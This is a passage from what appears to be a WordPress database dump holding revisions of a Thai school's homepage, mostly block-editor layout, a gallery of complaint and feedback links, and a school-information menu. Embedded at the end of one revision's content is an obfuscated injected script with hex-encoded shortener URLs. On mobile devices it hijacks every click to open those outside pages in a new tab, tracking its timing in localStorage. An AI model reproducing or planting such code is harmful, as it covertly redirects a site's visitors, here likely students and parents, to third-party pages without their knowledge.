"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"20px\",\"marginBottom\":\"10px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#0693e3\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[18,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:58:18','2024-07-27 03:58:18','',14,'http://pakhaeng.ssk.in.th/?p=61',0,'revision','',0),
(62,1,'2024-07-27 10:58:26','2024-07-27 03:58:26','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap 